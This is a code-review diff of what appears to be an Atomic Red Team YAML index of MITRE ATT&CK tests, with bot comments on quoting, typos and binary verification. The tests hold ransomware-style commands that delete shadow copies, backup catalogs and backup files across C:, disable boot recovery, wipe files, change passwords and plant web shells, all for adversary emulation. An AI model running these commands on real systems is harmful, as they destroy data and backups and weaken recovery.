@@ -15215,10 +15243,10 @@ privilege-escalation:
|
|
|
|
|
command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN
|
|
|
|
|
"Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'SCHTASKS /Delete /TN "Atomic task" /F
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Powershell Cmdlet Scheduled Task
|
|
|
|
|
description: "Create an atomic scheduled task that leverages native powershell
|
|
|
|
|
cmdlets.\n\nUpon successful execution, powershell.exe will create a scheduled
|
|
|
|
@@ -15238,7 +15266,7 @@ privilege-escalation:
|
|
|
|
|
cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false
|
|
|
|
|
>$null 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1058:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -15378,7 +15406,7 @@ privilege-escalation:
|
|
|
|
|
description: 'Make, change owner, and change file attributes on a C source code
|
|
|
|
|
file
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -15404,7 +15432,7 @@ privilege-escalation:
|
|
|
|
|
- name: Set a SetUID flag on file
|
|
|
|
|
description: 'This test sets the SetUID flag on a file in Linux and macOS.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -15422,11 +15450,11 @@ privilege-escalation:
|
|
|
|
|
sudo chmod u+s #{file_to_setuid}
|
|
|
|
|
cleanup_command: 'sudo rm #{file_to_setuid}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Set a SetGID flag on file
|
|
|
|
|
description: 'This test sets the SetGID flag on a file in Linux and macOS.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -15444,7 +15472,7 @@ privilege-escalation:
|
|
|
|
|
sudo chmod g+s #{file_to_setuid}
|
|
|
|
|
cleanup_command: 'sudo rm #{file_to_setuid}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1165:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -15516,10 +15544,10 @@ privilege-escalation:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'sudo touch /Library/StartupItems/EvilStartup.plist
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1169:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -15569,7 +15597,7 @@ privilege-escalation:
|
|
|
|
|
- name: Sudo usage
|
|
|
|
|
description: 'Common Sudo enumeration methods.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -15650,7 +15678,7 @@ privilege-escalation:
|
|
|
|
|
This is dangerous to modify without using ''visudo'', do not do this on a
|
|
|
|
|
production system.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -15663,7 +15691,7 @@ privilege-escalation:
|
|
|
|
|
description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous
|
|
|
|
|
to modify without using ''visudo'', do not do this on a production system.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -15760,10 +15788,10 @@ privilege-escalation:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'xcopy #{web_shells} #{web_shell_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'del #{web_shell_path} >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
impact:
|
|
|
|
|
T1531:
|
|
|
|
|
technique:
|
|
|
|
@@ -15825,7 +15853,7 @@ impact:
|
|
|
|
|
description: 'Changes the user password to hinder access attempts. Seen in use
|
|
|
|
|
by LockerGoga.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -15850,14 +15878,14 @@ impact:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'net.exe user #{user_account} #{new_password}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'net.exe user #{user_account} /delete
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Delete User - Windows
|
|
|
|
|
description: 'Deletes a user account to prevent access.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -15948,73 +15976,39 @@ impact:
|
|
|
|
|
modified: '2019-07-19T14:34:28.595Z'
|
|
|
|
|
identifier: T1485
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: Windows - Delete Volume Shadow Copies
|
|
|
|
|
description: 'Deletes Windows Volume Shadow Copies. This technique is used by
|
|
|
|
|
numerous ransomware families and APT malware such as Olympic Destroyer.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'vssadmin.exe delete shadows /all /quiet
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: Windows - Delete Windows Backup Catalog
|
|
|
|
|
description: 'Deletes Windows Backup Catalog. This technique is used by numerous
|
|
|
|
|
ransomware families and APT malware such as Olympic Destroyer.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'wbadmin.exe delete catalog -quiet
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: Windows - Disable Windows Recovery Console Repair
|
|
|
|
|
description: |
|
|
|
|
|
Disables repair by the Windows Recovery Console on boot.
|
|
|
|
|
This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: |
|
|
|
|
|
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
|
|
|
|
|
bcdedit.exe /set {default} recoveryenabled no
|
|
|
|
|
cleanup_command: |
|
|
|
|
|
bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures
|
|
|
|
|
bcdedit.exe /set {default} recoveryenabled yes
|
|
|
|
|
- name: Windows - Overwrite file with Sysinternals SDelete
|
|
|
|
|
description: |
|
|
|
|
|
Overwrites and deletes a file using Sysinternals SDelete.
|
|
|
|
|
Requires the download of either Sysinternals Suite or the individual SDelete utility.
|
|
|
|
|
Overwrites and deletes a file using Sysinternals SDelete. Upon successful execution, "Files deleted: 1" will be displayed in
|
|
|
|
|
the powershell session along with other information about the file that was deleted.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
sdelete_exe:
|
|
|
|
|
description: Path of sdelete executable
|
|
|
|
|
type: Path
|
|
|
|
|
default: PathToAtomicsFolder\T1485\bin\sdelete.exe
|
|
|
|
|
default: "$env:TEMP\\Sdelete\\sdelete.exe"
|
|
|
|
|
file_to_delete:
|
|
|
|
|
description: Path of file to delete
|
|
|
|
|
type: path
|
|
|
|
|
default: "$env:TEMP\\T1485.txt"
|
|
|
|
|
dependency_executor_name: powershell
|
|
|
|
|
dependencies:
|
|
|
|
|
- description: Secure delete tool from Sysinternals must exist on disk at specified
|
|
|
|
|
location (#{sdelete_exe})
|
|
|
|
|
prereq_command: 'if (Test-Path #{sdelete_exe}) {0} else {1}'
|
|
|
|
|
prereq_command: 'if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1}'
|
|
|
|
|
get_prereq_command: |-
|
|
|
|
|
Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "$env:TEMP\SDelete.zip"
|
|
|
|
|
Expand-Archive $env:TEMP\SDelete.zip $env:TEMP\Sdelete -Force
|
|
|
|
|
New-Item -ItemType Directory (Split-Path "#{sdelete_exe}") -Force | Out-Null
|
|
|
|
|
Copy-Item $env:TEMP\Sdelete\sdelete.exe "#{sdelete_exe}" -Force
|
|
|
|
|
Remove-Item $env:TEMP\SDelete.zip -Force
|
|
|
|
|
- description: 'The file to delete must exist at #{file_to_delete}'
|
|
|
|
|
prereq_command: 'if (Test-Path #{file_to_delete}) { exit 0 } else { exit 1
|
|
|
|
|
}'
|
|
|
|
|
get_prereq_command: 'New-Item #{file_to_delete} -Force | Out-Null'
|
|
|
|
|
executor:
|
|
|
|
|
name: powershell
|
|
|
|
|
command: |
|
|
|
|
|
New-Item $env:TEMP\T1485.txt
|
|
|
|
|
#{sdelete_exe} -accepteula $env:TEMP\T1485.txt
|
|
|
|
|
command: 'Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: macOS/Linux - Overwrite file with DD
|
|
|
|
|
description: |
|
|
|
|
|
Overwrites and deletes a file using DD.
|
|
|
|
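Review bot: The new `command: 'Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}"'` builds a command string from two unquoted input arguments, so a path containing a space (both defaults live under `$env:TEMP`, which includes the user name) breaks the invocation, and Invoke-Expression adds nothing that the call operator does not already provide. The new `get_prereq_command` downloads SDelete.zip and the executor then runs the extracted binary with nothing checking what was fetched; verifying the Authenticode signature after `Expand-Archive` (Sysinternals binaries are signed — confirm the expected signer when adopting this), or pinning a SHA-256 via `Get-FileHash`, makes the dependency tamper-evident. Minor: `type: path` on `file_to_delete` differs from `type: Path` on `sdelete_exe` and elsewhere in the file. The rewritten lines:
```yaml
    get_prereq_command: |-
      Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "$env:TEMP\SDelete.zip"
      Expand-Archive $env:TEMP\SDelete.zip $env:TEMP\Sdelete -Force
      $sig = Get-AuthenticodeSignature "$env:TEMP\Sdelete\sdelete.exe"
      if ($sig.Status -ne 'Valid') { throw "sdelete.exe is not validly signed; refusing to run an unverified binary" }
      # ... unchanged: New-Item, Copy-Item, Remove-Item ...
  executor:
    name: powershell
    command: '& "#{sdelete_exe}" -accepteula "#{file_to_delete}"'
```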
@@ -16035,20 +16029,7 @@ impact:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'dd of=#{file_to_overwrite} if=#{overwrite_source}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: Windows - Delete Backup Files
|
|
|
|
|
description: 'Deletes backup files in a manner similar to Ryuk ransomware.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.*
|
|
|
|
|
c:\backup*.* c:\*.set c:\*.win c:\*.dsk >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
'':
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -16169,23 +16150,32 @@ impact:
|
|
|
|
|
identifier: T1490
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: Windows - Delete Volume Shadow Copies
|
|
|
|
|
description: 'Deletes Windows Volume Shadow Copies. This technique is used by
|
|
|
|
|
numerous ransomware families and APT malware such as Olympic Destroyer.
|
|
|
|
|
description: |
|
|
|
|
|
Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon
|
|
|
|
|
execution, if no shadow volumes exist the message "No items found that satisfy the query." will be displayed. If shadow volumes are present, it
|
|
|
|
|
will delete them without printing output to the screen. This is because the /quiet parameter was passed which also suppresses the y/n
|
|
|
|
|
confirmation prompt. Shadow copies can only be created on Windows server or Windows 8.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc788055(v=ws.11)
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
dependency_executor_name: powershell
|
|
|
|
|
dependencies:
|
|
|
|
|
- description: Create volume shadow copy of C:\ . This prereq command only works
|
|
|
|
|
on Windows Server or Windows 8.
|
|
|
|
|
prereq_command: if(!(vssadmin.exe list shadows | findstr "No items found that
|
|
|
|
|
satisfy the query.")) { exit 0 } else { exit 1 }
|
|
|
|
|
get_prereq_command: 'vssadmin.exe create shadow /for=c:'
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'vssadmin.exe delete shadows /all /quiet
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Windows - Delete Volume Shadow Copies via WMI
|
|
|
|
|
description: 'Deletes Windows Volume Shadow Copies via WMI. This technique is
|
|
|
|
|
used by numerous ransomware families and APT malware such as Olympic Destroyer.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Deletes Windows Volume Shadow Copies via WMI. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
|
|
|
|
|
Shadow copies can only be created on Windows server or Windows 8.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
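Review bot: The added `prereq_command` is a plain, unquoted scalar wrapped across two lines (`... "No items found that` / `satisfy the query.")) { exit 0 } else { exit 1 }`); YAML folds the break into a single space so it happens to parse, but the other `prereq_command` values in this file are single-quoted one-liners, and a later edit introducing `: ` or ` #` would turn this one into a parse error, so quote it the same way. The check also keys on the English vssadmin message `No items found that satisfy the query.`, so on a non-English system the `findstr` presumably never matches and the prereq reports shadow copies as present when none exist; either note that limitation in the dependency description or test for `Shadow Copy ID` lines in the output instead.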
@@ -16193,12 +16183,11 @@ impact:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'wmic.exe shadowcopy delete
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Windows - Delete Windows Backup Catalog
|
|
|
|
|
description: 'Deletes Windows Backup Catalog. This technique is used by numerous
|
|
|
|
|
ransomware families and APT malware such as Olympic Destroyer.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Deletes Windows Backup Catalog. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon execution,
|
|
|
|
|
"The backup catalog has been successfully deleted." will be displayed in the PowerShell session.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -16206,11 +16195,11 @@ impact:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'wbadmin.exe delete catalog -quiet
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Windows - Disable Windows Recovery Console Repair
|
|
|
|
|
description: "Disables repair by the Windows Recovery Console on boot. \nThis
|
|
|
|
|
technique is used by numerous ransomware families and APT malware such as
|
|
|
|
|
Olympic Destroyer.\n"
|
|
|
|
|
description: |
|
|
|
|
|
Disables repair by the Windows Recovery Console on boot. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
|
|
|
|
|
Upon execution, "The operation completed successfully." will be displayed in the powershell session.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -16219,19 +16208,36 @@ impact:
|
|
|
|
|
command: |
|
|
|
|
|
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
|
|
|
|
|
bcdedit.exe /set {default} recoveryenabled no
|
|
|
|
|
cleanup_command: |
|
|
|
|
|
bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures
|
|
|
|
|
bcdedit.exe /set {default} recoveryenabled yes
|
|
|
|
|
- name: Windows - Delete Volume Shadow Copies via WMI with PowerShell
|
|
|
|
|
description: "Deletes Windows Volume Shadow Copies with PowerShell code and
|
|
|
|
|
Get-WMIObject. \nThis technique is used by numerous ransomware families such
|
|
|
|
|
as Sodinokibi/REvil.\nExecutes Get-WMIObject \n"
|
|
|
|
|
description: |
|
|
|
|
|
Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject.
|
|
|
|
|
This technique is used by numerous ransomware families such as Sodinokibi/REvil.
|
|
|
|
|
Executes Get-WMIObject. Shadow copies can only be created on Windows server or Windows 8, so upon execution
|
|
|
|
|
there may be no output displayed.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
|
name: powershell
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: Windows - Delete Backup Files
|
|
|
|
|
description: |
|
|
|
|
|
Deletes backup files in a manner similar to Ryuk ransomware. Upon exection, many "access is denied" messages will appear as the commands try
|
|
|
|
|
to delete files from around the system.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | ForEach-Object
|
|
|
|
|
{$_.Delete();}"
|
|
|
|
|
command: 'del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.*
|
|
|
|
|
c:\backup*.* c:\*.set c:\*.win c:\*.dsk
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1496:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
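Review bot: The relocated "Windows - Delete Backup Files" test deletes matching files recursively across the whole C: volume (`del /s /f /q c:\*.VHD ... c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk`) and, unlike the sibling tests in this hunk, has no `cleanup_command`, so it cannot be undone; the new description should state this, e.g. append `This test is irreversible and should only be run on a disposable system.`. The new description line also misspells `Upon exection` (→ `Upon execution`). Dropping the old `>nul 2>&1` is consistent with the new text saying "access is denied" messages are expected, so that part reads fine.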
@@ -16307,7 +16313,7 @@ impact:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'yes > /dev/null
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1489:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -16377,9 +16383,10 @@ impact:
|
|
|
|
|
identifier: T1489
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: Windows - Stop service using Service Controller
|
|
|
|
|
description: 'Stops a specified service using the sc.exe command.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Stops a specified service using the sc.exe command. Upon execution, if the spooler service was running infomration will be displayed saying
|
|
|
|
|
it has changed to a state of STOP_PENDING. If the spooler service was not running "The service has not been started." will be displayed and it can be
|
|
|
|
|
started by running the cleanup command.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
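Review bot: The rewritten description misspells `infomration` (→ `information`) on the new line and hard-codes "the spooler service" even though the service comes from the `service_name` input argument (its default lies outside this hunk); suggested wording: `Upon execution, if the target service was running, information will be displayed saying it has changed to a state of STOP_PENDING. If it was not running, "The service has not been started." will be displayed and it can be started by running the cleanup command.`. The same pattern recurs in the "Windows - Stop service using net.exe" hunk, which quotes the Print Spooler messages verbatim, and in the "Windows - Stop service by killing process" hunk, where the new description keeps the existing `killng` typo and quotes a fixed `PID 2316` that will differ on every run.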
@@ -16392,14 +16399,15 @@ impact:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'sc.exe stop #{service_name}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'sc.exe start #{service_name}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Windows - Stop service using net.exe
|
|
|
|
|
description: 'Stops a specified service using the net.exe command.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Stops a specified service using the net.exe command. Upon execution, if the service was running "The Print Spooler service was stopped successfully."
|
|
|
|
|
will be displayed. If the service was not running, "The Print Spooler service is not started." will be displayed and it can be
|
|
|
|
|
started by running the cleanup command.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -16412,13 +16420,16 @@ impact:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'net.exe stop #{service_name}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'net.exe start #{service_name}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Windows - Stop service by killing process
|
|
|
|
|
description: "Stops a specified service killng the service's process. \nThis
|
|
|
|
|
technique was used by WannaCry.\n"
|
|
|
|
|
description: |
|
|
|
|
|
Stops a specified service killng the service's process.
|
|
|
|
|
This technique was used by WannaCry. Upon execution, if the spoolsv service was running "SUCCESS: The process "spoolsv.exe" with PID 2316 has been terminated."
|
|
|
|
|
will be displayed. If the service was not running "ERROR: The process "spoolsv.exe" not found." will be displayed and it can be
|
|
|
|
|
started by running the cleanup command.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -16431,7 +16442,7 @@ impact:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'taskkill.exe /f /im #{process_name}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1529:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -16490,7 +16501,7 @@ impact:
|
|
|
|
|
- name: Shutdown System - Windows
|
|
|
|
|
description: 'This test shuts down a Windows system.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -16503,11 +16514,11 @@ impact:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'shutdown /s /t #{timeout}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Restart System - Windows
|
|
|
|
|
description: 'This test restarts a Windows system.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -16520,11 +16531,11 @@ impact:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'shutdown /r /t #{timeout}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Restart System via `shutdown` - macOS/Linux
|
|
|
|
|
description: 'This test restarts a macOS/Linux system.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -16538,11 +16549,11 @@ impact:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'shutdown -r #{timeout}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Shutdown System via `shutdown` - macOS/Linux
|
|
|
|
|
description: 'This test shuts down a macOS/Linux system using a halt.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -16556,11 +16567,11 @@ impact:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'shutdown -h #{timeout}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Restart System via `reboot` - macOS/Linux
|
|
|
|
|
description: 'This test restarts a macOS/Linux system via `reboot`.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -16569,11 +16580,11 @@ impact:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'reboot
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Shutdown System via `halt` - Linux
|
|
|
|
|
description: 'This test shuts down a Linux system using `halt`.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
executor:
|
|
|
|
@@ -16583,7 +16594,7 @@ impact:
|
|
|
|
|
- name: Reboot System via `halt` - Linux
|
|
|
|
|
description: 'This test restarts a Linux system using `halt`.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
executor:
|
|
|
|
@@ -16593,7 +16604,7 @@ impact:
|
|
|
|
|
- name: Shutdown System via `poweroff` - Linux
|
|
|
|
|
description: 'This test shuts down a Linux system using `poweroff`.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
executor:
|
|
|
|
@@ -16603,7 +16614,7 @@ impact:
|
|
|
|
|
- name: Reboot System via `poweroff` - Linux
|
|
|
|
|
description: 'This test restarts a Linux system using `poweroff`.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
executor:
|
|
|
|
@@ -16705,7 +16716,7 @@ discovery:
|
|
|
|
|
- name: Enumerate all accounts
|
|
|
|
|
description: 'Enumerate all accounts by copying /etc/passwd to another file
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -16718,7 +16729,7 @@ discovery:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'cat /etc/passwd > #{output_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: View sudoers access
|
|
|
|
|
description: "(requires root)\n"
|
|
|
|
|
supported_platforms:
|
|
|
|
@@ -16733,11 +16744,11 @@ discovery:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'cat /etc/sudoers > #{output_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: View accounts with UID 0
|
|
|
|
|
description: 'View accounts wtih UID 0
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -16750,11 +16761,11 @@ discovery:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'grep ''x:0:'' /etc/passwd > #{output_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: List opened files by user
|
|
|
|
|
description: 'List opened files by user
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -16762,11 +16773,11 @@ discovery:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'username=$(echo $HOME | awk -F''/'' ''{print $3}'') && lsof -u $username
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Show if a user account has ever logged in remotely
|
|
|
|
|
description: 'Show if a user account has ever logged in remotely
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -16778,11 +16789,11 @@ discovery:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'lastlog > #{output_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Enumerate users and groups
|
|
|
|
|
description: 'Utilize groups and id to enumerate users and groups
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -16794,7 +16805,7 @@ discovery:
|
|
|
|
|
